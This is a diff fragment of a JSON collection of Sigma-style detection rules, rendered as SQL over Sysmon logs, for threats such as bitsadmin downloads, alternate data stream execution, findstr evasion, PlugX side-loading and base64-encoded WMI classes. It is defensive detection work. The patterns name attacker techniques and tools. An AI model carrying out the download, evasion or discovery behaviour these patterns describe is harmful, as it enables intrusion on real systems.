], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_bitsadmin_download.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execute From Alternate Data Streams", + "id": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "status": "test", + "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1485" - ], - "falsepositives": [ - "System administrator usage" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.t1564.004" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" - }, - { - "title": "Suspicious SysAidServer Child", - "id": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", - "status": "experimental", - "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", - "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%SysAidServer%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%txt:%' ESCAPE '\\' AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\') OR (CommandLine LIKE '%makecab %' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '% export %' ESCAPE '\\') OR (CommandLine LIKE '%regedit %' ESCAPE '\\' AND CommandLine LIKE '% /E %' ESCAPE '\\') OR (CommandLine LIKE '%esentutl %' ESCAPE '\\' AND CommandLine LIKE '% /y %' ESCAPE '\\' AND CommandLine LIKE '% /d %' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_sysaidserver_susp_child_process.yml" + "filename": 
"proc_creation_win_susp_alternate_data_streams.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", - "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": "37db85d1-b089-490a-a59a-c7b6f984f480", + "status": "test", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE 
'\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "Suspicious Copy From or To System32", - "id": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "title": "Abusing Findstr for Defense Evasion", + "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", "status": "test", - "description": "Detects a suspicious copy operation that tries to copy a program from a system (System32 or SysWOW64) directory to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations\n", - "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", 
+ "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" ], "falsepositives": [ - "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", - "When cmd.exe and xcopy.exe are called directly", - "When the command contains the keywords but not in the correct order" + "Administrative findstr usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\')) OR ((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE'))) AND (CommandLine LIKE '%\\\\System32%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR Image LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_copy_system32.yml" + "filename": 
"proc_creation_win_lolbin_findstr.yml" }, { - "title": "Suspicious Child Process Created as System", - "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", - "status": "test", - "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", - "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.002" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_child_process_as_system_.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.s0013", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common 
Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious ScreenSave Change by Reg.exe", - "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", + "title": "Hardware Model Reconnaissance Via Wmic.EXE", + "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", "status": "experimental", - "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", - "author": "frack113", - "tags": [ - "attack.privilege_escalation", - "attack.t1546.002" - ], - "falsepositives": [ - "GPO" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE 
'\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_reg_screensaver.yml" - }, - { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", - "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", + "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_wmic_recon_csproduct.yml" }, { - "title": "Suspicious Windows App Activity", - "id": 
"f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine 
LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": 
"0ba1da6d-b6ce-4366-828c-18826c9de23e", - "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "title": "Execute Code with Pester.bat as Parent", + "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "status": "experimental", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1216" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE 